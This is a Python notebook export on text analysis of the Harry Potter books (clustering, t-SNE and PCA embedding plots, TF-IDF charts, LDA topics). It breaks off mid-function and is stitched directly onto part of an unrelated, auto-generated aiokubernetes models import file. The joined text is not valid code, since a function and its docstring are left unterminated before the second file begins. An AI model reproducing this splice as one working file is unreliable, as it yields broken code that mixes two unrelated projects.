sorted(show_topics(V, terms))  # SVD topics; last expression, displayed by the notebook
# ### 2.7- CLUSTERING
# <a id="clustering"></a>
# In[53]:
k = 4 # Number of clusters, chosen assuming each pair of books could form one cluster
# Reduce the TF-IDF matrix to 800 latent dimensions before clustering.
get_ipython().run_line_magic('time', 'X2 = TruncatedSVD(n_components=800).fit_transform(X)')
agg = AgglomerativeClustering(n_clusters=k)
# In[54]:
# Fit the agglomerative clustering on a 3000-row random sample (without
# replacement) rather than the full matrix.
sample = np.random.choice(len(X2), replace=False, size=3000)
get_ipython().run_line_magic('time', 'agg_sample = agg.fit_predict(X2[sample])')
# In[55]:
# let's get the centroid/average of each cluster
centroids = np.array([X2[sample][agg_sample == c].mean(axis=0) for c in range(k)])
print(centroids.shape)
# In[56]:
# initialize k-means with the agglomerative clusters' centroids, then fit on
# the FULL reduced matrix.
km = KMeans(n_clusters=k, n_jobs=-1, init=centroids)
get_ipython().run_line_magic('time', 'km.fit(X2)')
# In[57]:
# Evaluate the silhouette score for cluster counts 3..14 (on the same sample)
# and plot the trend to pick k.
silhouettes = []
K = range(3,15)
for c in K:
    agg_clustering = AgglomerativeClustering(n_clusters=c)
    agg_cluster_ids = agg_clustering.fit_predict(X2[sample])
#    agg_centroids = np.array([X2[[i for i, v in enumerate(agg_cluster_ids) if v == k]].mean(axis=0)
#                              for k in range(c)])
#    kmeans_clustering = KMeans(n_clusters=c, n_jobs=-1, init=agg_centroids)
#    kmeans_ids = kmeans_clustering.fit_predict(X2)
    score = silhouette_score(X2[sample], agg_cluster_ids)
    silhouettes.append(score)
    print(c, score)
fig, ax = plt.subplots(figsize=(20,10))
plt.plot(K, silhouettes, 'bx-')
plt.xlabel('k')
plt.ylabel('Silhouette score')
plt.title('Silhouette Method For Optimal k')
plt.show()
# 4 clusters appears appropriate from the silhouette curve.
# ## 3. Visualization
# <a id="visualization"></a>
# ### 3.1- WORD EMBEDDINGS VISUALIZATION
# <a id="word-visua"></a>
# In[86]:
'''
T-sne to visualize word embeddings
'''
def words_space_tsne(model, word, list_names):
    """ Plot in seaborn the results from the t-SNE of a word,
    its list of most similar words, and a list of random words.
    """
    # One embedding row per plotted word. Assumes 300-dimensional word vectors
    # (the np.empty((0, 300)) buffer) — TODO confirm against the trained model.
    arrays = np.empty((0, 300), dtype='f')
    word_labels = [word]
    color_list = ['red']  # the query word is plotted in red
    arrays = np.append(arrays, model.wv.__getitem__([word]), axis=0)
    close_words = model.wv.most_similar(positive = [word]) #Get the most similar words
    # Nearest neighbours of the query word: blue points.
    for wrd_score in close_words:
        wrd_vector = model.wv.__getitem__([wrd_score[0]])
        word_labels.append(wrd_score[0])
        color_list.append('blue')
        arrays = np.append(arrays, wrd_vector, axis=0)
    for wrd in list_names: # caller-supplied comparison words: green points
        wrd_vector = model.wv.__getitem__([wrd])
        word_labels.append(wrd)
        color_list.append('green')
        arrays = np.append(arrays, wrd_vector, axis=0)
    reduc = PCA(n_components=19).fit_transform(arrays) # PCA to 19 dims before t-SNE
    np.set_printoptions(suppress=True)
    # t-SNE down to 2-D for plotting; fixed random_state for repeatability.
    Y = TSNE(n_components=2, random_state=0, perplexity=15).fit_transform(reduc)
    df = pd.DataFrame({'x': [x for x in Y[:, 0]],
                       'y': [y for y in Y[:, 1]],
                       'words': word_labels,
                       'color': color_list})
    fig, _ = plt.subplots()
    fig.set_size_inches(9, 9)
    p1 = sns.regplot(data=df, x="x",y="y", fit_reg=False, marker="o", scatter_kws={'s': 40,'facecolors': df['color']})
    # Annotate every point with its title-cased word in the matching colour.
    for line in range(0, df.shape[0]):
        p1.text(df["x"][line],
                df['y'][line],' ' + df["words"][line].title(),horizontalalignment='left',
                verticalalignment='bottom', size='medium',
                color=df['color'][line],
                weight='normal'
                ).set_size(15)
    # Pad the axes so edge labels stay inside the figure.
    plt.xlim(Y[:, 0].min()-50, Y[:, 0].max()+50)
    plt.ylim(Y[:, 1].min()-50, Y[:, 1].max()+50)
    plt.title('t-SNE visualization for {}'.format(word.title()))
# In[87]:
# Show 'harry' (red), its nearest neighbours (blue) and a hand-picked list of
# comparison words (green) in one t-SNE plot.
words_space_tsne(w2v_model, 'harry', ['magic', 'school','death_eater','ginny', 'train', 'hermione', 'ron','dumbledore'])
# ### 3.2- TSNE WORD2VEC VISUALIZATION
# <a id="tsne"></a>
# In[88]:
# Project the ENTIRE word2vec vocabulary to 2-D and scatter it (no labels).
tsne = sklearn.manifold.TSNE(n_components=2, random_state=0)
all_word_vectors_matrix = w2v_model.wv.vectors
all_word_vectors_matrix_2d = tsne.fit_transform(all_word_vectors_matrix)
# One (word, x, y) row per vocabulary entry, looked up via the model's index.
points = pd.DataFrame(
    [
        (word, coords[0], coords[1])
        for word, coords in [
            (word, all_word_vectors_matrix_2d[w2v_model.wv.vocab[word].index])
            for word in w2v_model.wv.vocab
        ]
    ],
    columns=["word", "x", "y"]
)
sns.set_context("poster")
points.plot.scatter("x", "y", s=10,c='blue',figsize=(20, 12),alpha=0.4)
# ### 3.3- WORD2VEC FOR BOOK1 AND BOOK7 REPRESENTATION
# <a id="book1book7"></a>
# In[89]:
def tsne_scatter(model):
    """Scatter-plot a 2-D t-SNE projection of every word in `model`'s
    vocabulary, annotating each point with its word."""
    labels = []
    tokens = []
    # Collect every embedding vector together with its word.
    for word in model.wv.vocab:
        tokens.append(model.wv.__getitem__(word))
        labels.append(word)
    # PCA initialisation; 2500 iterations for convergence on a small vocabulary.
    tsne_model = TSNE(perplexity=15, n_components=2, init='pca', n_iter=2500)
    new_values = tsne_model.fit_transform(tokens)
    x = []
    y = []
    for value in new_values:
        x.append(value[0])
        y.append(value[1])
    plt.figure(figsize=(20, 20))
    # One scatter call per point so each annotation pairs with its marker.
    for i in range(len(x)):
        plt.scatter(x[i],y[i],alpha = 0.4)
        plt.annotate(labels[i], xy=(x[i], y[i]), xytext=(5, 2), textcoords='offset points', ha='left', va='top',fontsize = 12)
    plt.title('Visualization {}'.format(model),fontsize=20)
    plt.show()
# In[90]:
tsne_scatter(w2v_model_1)  # presumably the Book 1 model, per its name
# In[91]:
tsne_scatter(w2v_model_7)  # presumably the Book 7 model, per its name
# ### 3.4- PCA WORD EMBEDDINGS VISUALIZATION
# <a id="pcavisua"></a>
# In[92]:
def display_pca_scatterplot(model, words=None, sample=0):
    """Scatter-plot word embeddings projected onto their first two principal
    components, labelling each point with its word.

    Args:
        model: trained gensim word2vec model (vectors accessed via model.wv).
        words: explicit list of words to plot. If None, draw `sample` random
            vocabulary words, or plot the whole vocabulary when sample <= 0.
        sample: number of random words to draw when `words` is None.
    """
    if words is None:  # BUGFIX: identity check instead of `== None`
        if sample > 0:
            # BUGFIX: the vocabulary lives on model.wv (as accessed everywhere
            # else in this script, e.g. w2v_model.wv.vocab), not on `model`.
            words = np.random.choice(list(model.wv.vocab.keys()), sample)
        else:
            words = [word for word in model.wv.vocab]
    word_vectors = np.array([model.wv.__getitem__(w) for w in words])
    # Keep only the first two principal components for the 2-D plot.
    twodim = PCA().fit_transform(word_vectors)[:, :2]
    plt.figure(figsize=(10, 10))
    plt.scatter(twodim[:, 0], twodim[:, 1], edgecolors='k', c='r', alpha=0.4)
    # Small offset so labels do not sit exactly on their markers.
    for word, (x, y) in zip(words, twodim):
        plt.text(x + 0.001, y + 0.001, word, horizontalalignment='left', verticalalignment='center', fontsize=12)
# In[93]:
# Plot the PCA projection for a small, readable list of relevant words.
# Any word list works; the full vocabulary (words = w2v_model.wv.vocab.keys())
# can be plotted too but becomes unreadable.
words =['harry','ron','hermione','dumbledore','snape','voldemort','say','look','gryffindor']
display_pca_scatterplot(w2v_model, words)
# ##### 3.5- UNIGRAMS TF-IDF-TFIDF VISUALIZATION scaled by TF
# <a id="tf-scaled"></a>
# In[94]:
get_ipython().run_line_magic('matplotlib', 'inline')
plt.figure(figsize=(12,8))
sns.set_context('poster')
# Unigram scatter: x = tfidf, y = idf, marker size = term frequency.
plot = sns.scatterplot('tfidf','idf',size='tf', data =uni_df,legend= False,alpha=0.4)
# Hand-picked row indices of interesting unigrams to label on the plot.
indeces = [381,718,497,395,710]
for index in indeces:
    plot.text(uni_df.tfidf[index]+0.8, uni_df.idf[index]+0.2,uni_df.word[index], horizontalalignment='left', verticalalignment='top',fontsize=15)
# ### 3.6- BIGRAMS TF-IDF-TFIDF VISUALIZATION scaled by TF
# <a id="bigrams-scaled"></a>
# In[95]:
get_ipython().run_line_magic('matplotlib', 'inline')
sns.set_context('poster')
plt.figure(figsize=(12,8))
# Same scatter as section 3.5 but for bigrams (x = tfidf, y = idf, size = tf).
plot = sns.scatterplot('tfidf','idf',size ='tf', data =bi_df,legend= False,alpha=0.4)
# Hand-picked row indices of interesting bigrams to label on the plot.
indeces = [75,76,84,69,28,50,27,10]
for index in indeces:
    plot.text(bi_df.tfidf[index]+1.2, bi_df.idf[index]+0.1, bi_df.word[index], horizontalalignment='left', verticalalignment='top',fontsize=12)
# ##### 3.7- HARRY - RON - HERMIONE OCCURENCIES VISUALIZATION
# <a id="harry-ron-occ"></a>
# In[96]:
# NOTE(review): column suffixes suggest hr = Harry-Ron, hhe = Harry-Hermione,
# rhe = Ron-Hermione co-occurrence counts — confirm against the earlier cells.
HR_HHe_RHe.plot.line(xticks=range(0,7), yticks = (0,180))
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5));
# In[97]:
# Same data as a stacked bar chart, one bar per book.
HR_HHe_RHe.plot.bar(stacked=True)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5))
# In[98]:
# Join in the '_rhe' counts, keep only the three frequency columns, then plot
# each series in its own panel plus a combined fourth panel.
HR_HHe_RHe = HR_HHe.join(RHesum.add_suffix('_rhe'), on='Bookn')
HR_HHe_RHe = HR_HHe_RHe[['tf_hr', 'tf_hhe','tf_rhe']]
fig, ax = plt.subplots(nrows=1, ncols=4, figsize=(20, 10))
HR_HHe_RHe.plot.line( y='tf_hr', ax=ax[0], xticks=range(0,7));
HR_HHe_RHe.plot.line( y='tf_hhe', ax=ax[1], xticks=range(0,7));
HR_HHe_RHe.plot.line( y='tf_rhe', ax=ax[2], xticks=range(0,7));
HR_HHe_RHe.plot.line( y=['tf_hr','tf_hhe','tf_rhe'], ax=ax[3], xticks=range(0,7))
# ### 3.8- TOPIC MODELING VISUALIZATION
# <a id="topic-visua"></a>
# In[99]:
import pyLDAvis
import pyLDAvis.gensim
# Interactive inter-topic distance map for the static LDA model built earlier.
vis = pyLDAvis.gensim.prepare(topic_model=model, corpus = model_corpus,dictionary=dictionary_big)
pyLDAvis.enable_notebook()
pyLDAvis.display(vis)
#See the 'Topic Modeling Visualization' png file in the zip folder
# In[100]:
'''
Visualizing the distribution of topics across the different groups
'''
# Per-sentence topic scores: one column per topic descriptor, plus the book
# name ('HP' column) each sentence belongs to.
target_category = 'Book'
scores = [[t[1] for t in topic_corpus[entry]] for entry in range(len(sent_big))]
topic_distros = pd.DataFrame(data=scores, columns=descriptors)
topic_distros['HP'] = corpustot[target_category]
# In[101]:
topic_distros
# In[102]:
import matplotlib.pyplot as plt
import seaborn
seaborn.set_context('poster')
fig, ax = plt.subplots(figsize=(20, 10))
# Average topic weight per book, shown as grouped bars (legend outside axes).
aggregate_by_category = topic_distros[topic_distros.HP.isin('Harry Potter 1,Harry Potter 2,Harry Potter 3,Harry Potter 4,Harry Potter 5,Harry Potter 6,Harry Potter 7'.split(','))]
aggregate_by_category = aggregate_by_category.groupby(aggregate_by_category.HP).mean()
aggregate_by_category[descriptors].plot.bar(ax=ax);
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5));
# ### 3.9- CLUSTERING VISUALIZATION
# <a id="clust-visua"></a>
# In[103]:
# Smaller fonts than 'poster' for the dense cluster plots that follow.
sns.set_context('notebook')
def plot_vectors(vectors, title='VIZ', labels=None, dimensions=3):
"""
| |
# aiokubernetes/models/__init__.py (repo: tantioch/aiokubernetes)
# coding: utf-8
# flake8: noqa
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.10.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
# import models into model package
from aiokubernetes.models.admissionregistration_v1beta1_service_reference import AdmissionregistrationV1beta1ServiceReference
from aiokubernetes.models.apiregistration_v1beta1_service_reference import ApiregistrationV1beta1ServiceReference
from aiokubernetes.models.apps_v1beta1_deployment import AppsV1beta1Deployment
from aiokubernetes.models.apps_v1beta1_deployment_condition import AppsV1beta1DeploymentCondition
from aiokubernetes.models.apps_v1beta1_deployment_list import AppsV1beta1DeploymentList
from aiokubernetes.models.apps_v1beta1_deployment_rollback import AppsV1beta1DeploymentRollback
from aiokubernetes.models.apps_v1beta1_deployment_spec import AppsV1beta1DeploymentSpec
from aiokubernetes.models.apps_v1beta1_deployment_status import AppsV1beta1DeploymentStatus
from aiokubernetes.models.apps_v1beta1_deployment_strategy import AppsV1beta1DeploymentStrategy
from aiokubernetes.models.apps_v1beta1_rollback_config import AppsV1beta1RollbackConfig
from aiokubernetes.models.apps_v1beta1_rolling_update_deployment import AppsV1beta1RollingUpdateDeployment
from aiokubernetes.models.apps_v1beta1_scale import AppsV1beta1Scale
from aiokubernetes.models.apps_v1beta1_scale_spec import AppsV1beta1ScaleSpec
from aiokubernetes.models.apps_v1beta1_scale_status import AppsV1beta1ScaleStatus
from aiokubernetes.models.extensions_v1beta1_allowed_flex_volume import ExtensionsV1beta1AllowedFlexVolume
from aiokubernetes.models.extensions_v1beta1_allowed_host_path import ExtensionsV1beta1AllowedHostPath
from aiokubernetes.models.extensions_v1beta1_deployment import ExtensionsV1beta1Deployment
from aiokubernetes.models.extensions_v1beta1_deployment_condition import ExtensionsV1beta1DeploymentCondition
from aiokubernetes.models.extensions_v1beta1_deployment_list import ExtensionsV1beta1DeploymentList
from aiokubernetes.models.extensions_v1beta1_deployment_rollback import ExtensionsV1beta1DeploymentRollback
from aiokubernetes.models.extensions_v1beta1_deployment_spec import ExtensionsV1beta1DeploymentSpec
from aiokubernetes.models.extensions_v1beta1_deployment_status import ExtensionsV1beta1DeploymentStatus
from aiokubernetes.models.extensions_v1beta1_deployment_strategy import ExtensionsV1beta1DeploymentStrategy
from aiokubernetes.models.extensions_v1beta1_fs_group_strategy_options import ExtensionsV1beta1FSGroupStrategyOptions
from aiokubernetes.models.extensions_v1beta1_host_port_range import ExtensionsV1beta1HostPortRange
from aiokubernetes.models.extensions_v1beta1_id_range import ExtensionsV1beta1IDRange
from aiokubernetes.models.extensions_v1beta1_pod_security_policy import ExtensionsV1beta1PodSecurityPolicy
from aiokubernetes.models.extensions_v1beta1_pod_security_policy_list import ExtensionsV1beta1PodSecurityPolicyList
from aiokubernetes.models.extensions_v1beta1_pod_security_policy_spec import ExtensionsV1beta1PodSecurityPolicySpec
from aiokubernetes.models.extensions_v1beta1_rollback_config import ExtensionsV1beta1RollbackConfig
from aiokubernetes.models.extensions_v1beta1_rolling_update_deployment import ExtensionsV1beta1RollingUpdateDeployment
from aiokubernetes.models.extensions_v1beta1_run_as_user_strategy_options import ExtensionsV1beta1RunAsUserStrategyOptions
from aiokubernetes.models.extensions_v1beta1_se_linux_strategy_options import ExtensionsV1beta1SELinuxStrategyOptions
from aiokubernetes.models.extensions_v1beta1_scale import ExtensionsV1beta1Scale
from aiokubernetes.models.extensions_v1beta1_scale_spec import ExtensionsV1beta1ScaleSpec
from aiokubernetes.models.extensions_v1beta1_scale_status import ExtensionsV1beta1ScaleStatus
from aiokubernetes.models.extensions_v1beta1_supplemental_groups_strategy_options import ExtensionsV1beta1SupplementalGroupsStrategyOptions
from aiokubernetes.models.policy_v1beta1_allowed_flex_volume import PolicyV1beta1AllowedFlexVolume
from aiokubernetes.models.policy_v1beta1_allowed_host_path import PolicyV1beta1AllowedHostPath
from aiokubernetes.models.policy_v1beta1_fs_group_strategy_options import PolicyV1beta1FSGroupStrategyOptions
from aiokubernetes.models.policy_v1beta1_host_port_range import PolicyV1beta1HostPortRange
from aiokubernetes.models.policy_v1beta1_id_range import PolicyV1beta1IDRange
from aiokubernetes.models.policy_v1beta1_pod_security_policy import PolicyV1beta1PodSecurityPolicy
from aiokubernetes.models.policy_v1beta1_pod_security_policy_list import PolicyV1beta1PodSecurityPolicyList
from aiokubernetes.models.policy_v1beta1_pod_security_policy_spec import PolicyV1beta1PodSecurityPolicySpec
from aiokubernetes.models.policy_v1beta1_run_as_user_strategy_options import PolicyV1beta1RunAsUserStrategyOptions
from aiokubernetes.models.policy_v1beta1_se_linux_strategy_options import PolicyV1beta1SELinuxStrategyOptions
from aiokubernetes.models.policy_v1beta1_supplemental_groups_strategy_options import PolicyV1beta1SupplementalGroupsStrategyOptions
from aiokubernetes.models.runtime_raw_extension import RuntimeRawExtension
from aiokubernetes.models.v1_api_group import V1APIGroup
from aiokubernetes.models.v1_api_group_list import V1APIGroupList
from aiokubernetes.models.v1_api_resource import V1APIResource
from aiokubernetes.models.v1_api_resource_list import V1APIResourceList
from aiokubernetes.models.v1_api_service import V1APIService
from aiokubernetes.models.v1_api_service_condition import V1APIServiceCondition
from aiokubernetes.models.v1_api_service_list import V1APIServiceList
from aiokubernetes.models.v1_api_service_spec import V1APIServiceSpec
from aiokubernetes.models.v1_api_service_status import V1APIServiceStatus
from aiokubernetes.models.v1_api_versions import V1APIVersions
from aiokubernetes.models.v1_aws_elastic_block_store_volume_source import V1AWSElasticBlockStoreVolumeSource
from aiokubernetes.models.v1_affinity import V1Affinity
from aiokubernetes.models.v1_aggregation_rule import V1AggregationRule
from aiokubernetes.models.v1_attached_volume import V1AttachedVolume
from aiokubernetes.models.v1_azure_disk_volume_source import V1AzureDiskVolumeSource
from aiokubernetes.models.v1_azure_file_persistent_volume_source import V1AzureFilePersistentVolumeSource
from aiokubernetes.models.v1_azure_file_volume_source import V1AzureFileVolumeSource
from aiokubernetes.models.v1_binding import V1Binding
from aiokubernetes.models.v1_csi_persistent_volume_source import V1CSIPersistentVolumeSource
from aiokubernetes.models.v1_capabilities import V1Capabilities
from aiokubernetes.models.v1_ceph_fs_persistent_volume_source import V1CephFSPersistentVolumeSource
from aiokubernetes.models.v1_ceph_fs_volume_source import V1CephFSVolumeSource
from aiokubernetes.models.v1_cinder_volume_source import V1CinderVolumeSource
from aiokubernetes.models.v1_client_ip_config import V1ClientIPConfig
from aiokubernetes.models.v1_cluster_role import V1ClusterRole
from aiokubernetes.models.v1_cluster_role_binding import V1ClusterRoleBinding
from aiokubernetes.models.v1_cluster_role_binding_list import V1ClusterRoleBindingList
from aiokubernetes.models.v1_cluster_role_list import V1ClusterRoleList
from aiokubernetes.models.v1_component_condition import V1ComponentCondition
from aiokubernetes.models.v1_component_status import V1ComponentStatus
from aiokubernetes.models.v1_component_status_list import V1ComponentStatusList
from aiokubernetes.models.v1_config_map import V1ConfigMap
from aiokubernetes.models.v1_config_map_env_source import V1ConfigMapEnvSource
from aiokubernetes.models.v1_config_map_key_selector import V1ConfigMapKeySelector
from aiokubernetes.models.v1_config_map_list import V1ConfigMapList
from aiokubernetes.models.v1_config_map_projection import V1ConfigMapProjection
from aiokubernetes.models.v1_config_map_volume_source import V1ConfigMapVolumeSource
from aiokubernetes.models.v1_container import V1Container
from aiokubernetes.models.v1_container_image import V1ContainerImage
from aiokubernetes.models.v1_container_port import V1ContainerPort
from aiokubernetes.models.v1_container_state import V1ContainerState
from aiokubernetes.models.v1_container_state_running import V1ContainerStateRunning
from aiokubernetes.models.v1_container_state_terminated import V1ContainerStateTerminated
from aiokubernetes.models.v1_container_state_waiting import V1ContainerStateWaiting
from aiokubernetes.models.v1_container_status import V1ContainerStatus
from aiokubernetes.models.v1_controller_revision import V1ControllerRevision
from aiokubernetes.models.v1_controller_revision_list import V1ControllerRevisionList
from aiokubernetes.models.v1_cross_version_object_reference import V1CrossVersionObjectReference
from aiokubernetes.models.v1_daemon_endpoint import V1DaemonEndpoint
from aiokubernetes.models.v1_daemon_set import V1DaemonSet
from aiokubernetes.models.v1_daemon_set_condition import V1DaemonSetCondition
from aiokubernetes.models.v1_daemon_set_list import V1DaemonSetList
from aiokubernetes.models.v1_daemon_set_spec import V1DaemonSetSpec
from aiokubernetes.models.v1_daemon_set_status import V1DaemonSetStatus
from aiokubernetes.models.v1_daemon_set_update_strategy import V1DaemonSetUpdateStrategy
from aiokubernetes.models.v1_delete_options import V1DeleteOptions
from aiokubernetes.models.v1_deployment import V1Deployment
from aiokubernetes.models.v1_deployment_condition import V1DeploymentCondition
from aiokubernetes.models.v1_deployment_list import V1DeploymentList
from aiokubernetes.models.v1_deployment_spec import V1DeploymentSpec
from aiokubernetes.models.v1_deployment_status import V1DeploymentStatus
from aiokubernetes.models.v1_deployment_strategy import V1DeploymentStrategy
from aiokubernetes.models.v1_downward_api_projection import V1DownwardAPIProjection
from aiokubernetes.models.v1_downward_api_volume_file import V1DownwardAPIVolumeFile
from aiokubernetes.models.v1_downward_api_volume_source import V1DownwardAPIVolumeSource
from aiokubernetes.models.v1_empty_dir_volume_source import V1EmptyDirVolumeSource
from aiokubernetes.models.v1_endpoint_address import V1EndpointAddress
from aiokubernetes.models.v1_endpoint_port import V1EndpointPort
from aiokubernetes.models.v1_endpoint_subset import V1EndpointSubset
from aiokubernetes.models.v1_endpoints import V1Endpoints
from aiokubernetes.models.v1_endpoints_list import V1EndpointsList
from aiokubernetes.models.v1_env_from_source import V1EnvFromSource
from aiokubernetes.models.v1_env_var import V1EnvVar
from aiokubernetes.models.v1_env_var_source import V1EnvVarSource
from aiokubernetes.models.v1_event import V1Event
from aiokubernetes.models.v1_event_list import V1EventList
from aiokubernetes.models.v1_event_series import V1EventSeries
from aiokubernetes.models.v1_event_source import V1EventSource
from aiokubernetes.models.v1_exec_action import V1ExecAction
from aiokubernetes.models.v1_fc_volume_source import V1FCVolumeSource
from aiokubernetes.models.v1_flex_persistent_volume_source import V1FlexPersistentVolumeSource
from aiokubernetes.models.v1_flex_volume_source import V1FlexVolumeSource
from aiokubernetes.models.v1_flocker_volume_source import V1FlockerVolumeSource
from aiokubernetes.models.v1_gce_persistent_disk_volume_source import V1GCEPersistentDiskVolumeSource
from aiokubernetes.models.v1_git_repo_volume_source import V1GitRepoVolumeSource
from aiokubernetes.models.v1_glusterfs_volume_source import V1GlusterfsVolumeSource
from aiokubernetes.models.v1_group_version_for_discovery import V1GroupVersionForDiscovery
from aiokubernetes.models.v1_http_get_action import V1HTTPGetAction
from aiokubernetes.models.v1_http_header import V1HTTPHeader
from aiokubernetes.models.v1_handler import V1Handler
from aiokubernetes.models.v1_horizontal_pod_autoscaler import V1HorizontalPodAutoscaler
from aiokubernetes.models.v1_horizontal_pod_autoscaler_list import V1HorizontalPodAutoscalerList
from aiokubernetes.models.v1_horizontal_pod_autoscaler_spec import V1HorizontalPodAutoscalerSpec
from aiokubernetes.models.v1_horizontal_pod_autoscaler_status import V1HorizontalPodAutoscalerStatus
from aiokubernetes.models.v1_host_alias import V1HostAlias
from aiokubernetes.models.v1_host_path_volume_source import V1HostPathVolumeSource
from aiokubernetes.models.v1_ip_block import V1IPBlock
from aiokubernetes.models.v1_iscsi_persistent_volume_source import V1ISCSIPersistentVolumeSource
from aiokubernetes.models.v1_iscsi_volume_source import V1ISCSIVolumeSource
from aiokubernetes.models.v1_initializer import V1Initializer
from aiokubernetes.models.v1_initializers import V1Initializers
from aiokubernetes.models.v1_job import V1Job
from aiokubernetes.models.v1_job_condition import V1JobCondition
from aiokubernetes.models.v1_job_list import V1JobList
from aiokubernetes.models.v1_job_spec import V1JobSpec
from aiokubernetes.models.v1_job_status import V1JobStatus
from aiokubernetes.models.v1_key_to_path import V1KeyToPath
from aiokubernetes.models.v1_label_selector import V1LabelSelector
from aiokubernetes.models.v1_label_selector_requirement import V1LabelSelectorRequirement
from aiokubernetes.models.v1_lifecycle import V1Lifecycle
from aiokubernetes.models.v1_limit_range import V1LimitRange
from aiokubernetes.models.v1_limit_range_item import V1LimitRangeItem
from aiokubernetes.models.v1_limit_range_list import V1LimitRangeList
from aiokubernetes.models.v1_limit_range_spec import V1LimitRangeSpec
from aiokubernetes.models.v1_list_meta import V1ListMeta
from aiokubernetes.models.v1_load_balancer_ingress import V1LoadBalancerIngress
from aiokubernetes.models.v1_load_balancer_status import V1LoadBalancerStatus
from aiokubernetes.models.v1_local_object_reference import V1LocalObjectReference
from aiokubernetes.models.v1_local_subject_access_review import V1LocalSubjectAccessReview
from aiokubernetes.models.v1_local_volume_source import V1LocalVolumeSource
from aiokubernetes.models.v1_nfs_volume_source import V1NFSVolumeSource
from aiokubernetes.models.v1_namespace import V1Namespace
from aiokubernetes.models.v1_namespace_list import V1NamespaceList
from aiokubernetes.models.v1_namespace_spec import V1NamespaceSpec
from aiokubernetes.models.v1_namespace_status import V1NamespaceStatus
from aiokubernetes.models.v1_network_policy import V1NetworkPolicy
from aiokubernetes.models.v1_network_policy_egress_rule import V1NetworkPolicyEgressRule
from aiokubernetes.models.v1_network_policy_ingress_rule import V1NetworkPolicyIngressRule
from aiokubernetes.models.v1_network_policy_list import V1NetworkPolicyList
from aiokubernetes.models.v1_network_policy_peer import V1NetworkPolicyPeer
from aiokubernetes.models.v1_network_policy_port import V1NetworkPolicyPort
from aiokubernetes.models.v1_network_policy_spec import V1NetworkPolicySpec
from aiokubernetes.models.v1_node import V1Node
from aiokubernetes.models.v1_node_address import V1NodeAddress
from aiokubernetes.models.v1_node_affinity import V1NodeAffinity
from aiokubernetes.models.v1_node_condition import V1NodeCondition
from aiokubernetes.models.v1_node_config_source import V1NodeConfigSource
from aiokubernetes.models.v1_node_daemon_endpoints import V1NodeDaemonEndpoints
from aiokubernetes.models.v1_node_list import V1NodeList
from aiokubernetes.models.v1_node_selector import V1NodeSelector
from aiokubernetes.models.v1_node_selector_requirement import V1NodeSelectorRequirement
from aiokubernetes.models.v1_node_selector_term import V1NodeSelectorTerm
from aiokubernetes.models.v1_node_spec import V1NodeSpec
from aiokubernetes.models.v1_node_status import V1NodeStatus
from aiokubernetes.models.v1_node_system_info import V1NodeSystemInfo
from aiokubernetes.models.v1_non_resource_attributes import V1NonResourceAttributes
from aiokubernetes.models.v1_non_resource_rule import V1NonResourceRule
from aiokubernetes.models.v1_object_field_selector import V1ObjectFieldSelector
from aiokubernetes.models.v1_object_meta import V1ObjectMeta
from aiokubernetes.models.v1_object_reference import V1ObjectReference
from aiokubernetes.models.v1_owner_reference import V1OwnerReference
from aiokubernetes.models.v1_persistent_volume import V1PersistentVolume
from aiokubernetes.models.v1_persistent_volume_claim import V1PersistentVolumeClaim
from aiokubernetes.models.v1_persistent_volume_claim_condition import V1PersistentVolumeClaimCondition
from aiokubernetes.models.v1_persistent_volume_claim_list import V1PersistentVolumeClaimList
from aiokubernetes.models.v1_persistent_volume_claim_spec import V1PersistentVolumeClaimSpec
from aiokubernetes.models.v1_persistent_volume_claim_status import V1PersistentVolumeClaimStatus
from aiokubernetes.models.v1_persistent_volume_claim_volume_source import V1PersistentVolumeClaimVolumeSource
from aiokubernetes.models.v1_persistent_volume_list import V1PersistentVolumeList
from aiokubernetes.models.v1_persistent_volume_spec import V1PersistentVolumeSpec
from aiokubernetes.models.v1_persistent_volume_status import V1PersistentVolumeStatus
from aiokubernetes.models.v1_photon_persistent_disk_volume_source import V1PhotonPersistentDiskVolumeSource
from aiokubernetes.models.v1_pod import V1Pod
from aiokubernetes.models.v1_pod_affinity import V1PodAffinity
from aiokubernetes.models.v1_pod_affinity_term import V1PodAffinityTerm
from aiokubernetes.models.v1_pod_anti_affinity import V1PodAntiAffinity
from aiokubernetes.models.v1_pod_condition import V1PodCondition
from aiokubernetes.models.v1_pod_dns_config import V1PodDNSConfig
from aiokubernetes.models.v1_pod_dns_config_option import V1PodDNSConfigOption
from aiokubernetes.models.v1_pod_list import V1PodList
from aiokubernetes.models.v1_pod_security_context import V1PodSecurityContext
from aiokubernetes.models.v1_pod_spec import V1PodSpec
from aiokubernetes.models.v1_pod_status import V1PodStatus
from aiokubernetes.models.v1_pod_template import V1PodTemplate
from aiokubernetes.models.v1_pod_template_list import V1PodTemplateList
from aiokubernetes.models.v1_pod_template_spec import V1PodTemplateSpec
from aiokubernetes.models.v1_policy_rule import V1PolicyRule
from aiokubernetes.models.v1_portworx_volume_source import V1PortworxVolumeSource
from aiokubernetes.models.v1_preconditions import V1Preconditions
from aiokubernetes.models.v1_preferred_scheduling_term import V1PreferredSchedulingTerm
from aiokubernetes.models.v1_probe import V1Probe
from aiokubernetes.models.v1_projected_volume_source import V1ProjectedVolumeSource
from aiokubernetes.models.v1_quobyte_volume_source import V1QuobyteVolumeSource
from aiokubernetes.models.v1_rbd_persistent_volume_source import V1RBDPersistentVolumeSource
from aiokubernetes.models.v1_rbd_volume_source import V1RBDVolumeSource
from aiokubernetes.models.v1_replica_set import V1ReplicaSet
from aiokubernetes.models.v1_replica_set_condition import V1ReplicaSetCondition
from aiokubernetes.models.v1_replica_set_list import V1ReplicaSetList
from aiokubernetes.models.v1_replica_set_spec import V1ReplicaSetSpec
from aiokubernetes.models.v1_replica_set_status import V1ReplicaSetStatus
from aiokubernetes.models.v1_replication_controller import V1ReplicationController
from aiokubernetes.models.v1_replication_controller_condition import V1ReplicationControllerCondition
from aiokubernetes.models.v1_replication_controller_list import V1ReplicationControllerList
from aiokubernetes.models.v1_replication_controller_spec import V1ReplicationControllerSpec
from aiokubernetes.models.v1_replication_controller_status import V1ReplicationControllerStatus
from aiokubernetes.models.v1_resource_attributes import V1ResourceAttributes
from aiokubernetes.models.v1_resource_field_selector import V1ResourceFieldSelector
from aiokubernetes.models.v1_resource_quota import V1ResourceQuota
from aiokubernetes.models.v1_resource_quota_list import V1ResourceQuotaList
